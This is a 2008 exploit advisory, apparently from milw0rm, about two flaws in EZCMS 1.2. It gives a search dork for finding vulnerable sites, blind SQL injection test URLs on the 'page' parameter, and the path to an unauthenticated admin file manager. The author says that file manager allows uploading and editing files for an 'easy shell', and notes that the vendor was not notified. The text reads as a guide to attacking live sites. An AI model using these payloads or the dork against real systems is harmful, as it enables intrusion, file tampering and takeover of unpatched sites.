70 lines
No EOL
1.8 KiB
Text
70 lines
No EOL
1.8 KiB
Text
-[*]+================================================================================+[*]-
|
|
-[*]+ EZCMS <= 1.2 Multiple Remote Vulnerabilitys +[*]-
|
|
-[*]+================================================================================+[*]-
|
|
|
|
|
|
|
|
[*] Discovered By: t0pP8uZz
|
|
[*] Discovered On: 19 MAY 2008
|
|
[*] Script Download: http://eztechhelp.com
|
|
[*] DORK google/altavista: "Powered by EZCMS"
|
|
|
|
|
|
|
|
[*] Vendor Has Not Been Notified!
|
|
|
|
|
|
|
|
[*] DESCRIPTION:
|
|
|
|
EZCMS (all versions prior to date) suffers from 2 remote vulnerabilitys.
|
|
|
|
One of these being a BLIND Sql Injection in "index.php" and the "page" variable is injectable.
|
|
see example below.
|
|
|
|
The second one being a insecure filemanager, the filemanager is hidden away in admin, the devs
|
|
probarly thought no one would find it.. but here i am telling you ;)
|
|
see more below.
|
|
|
|
|
|
|
|
[*] Blind SQL Injection:
|
|
|
|
http://site.com/index.php?page=1 and 1=1
|
|
http://site.com/index.php?page=1 and 1=2
|
|
|
|
|
|
|
|
[*] Arbitrary Remote File Manager Access:
|
|
|
|
http://site.com/ezcms/admin/filemanager/
|
|
|
|
|
|
|
|
[*] NOTE/TIP:
|
|
|
|
no exploit coded for the blind injection, because no point due to you can get a easy shell
|
|
through the file manager, althou if your curious, use SQLMap. (check sourceforge)
|
|
|
|
the "File Manager" is a very easy to use bug, just browse to site.com/ezcms/admin/filemanager/
|
|
site.com being the actual site and you can upload/edit/delete/upload/move files/folders.
|
|
|
|
|
|
|
|
[*] GREETZ:
|
|
|
|
milw0rm.com, h4ck-y0u.org, CipherCrew !
|
|
|
|
|
|
|
|
[-] peace,
|
|
|
|
t0pP8uZz
|
|
|
|
|
|
|
|
-[*]+================================================================================+[*]-
|
|
-[*]+ EZCMS <= 1.2 Multiple Remote Vulnerabilitys +[*]-
|
|
-[*]+================================================================================+[*]-
|
|
|
|
# milw0rm.com [2008-06-14] |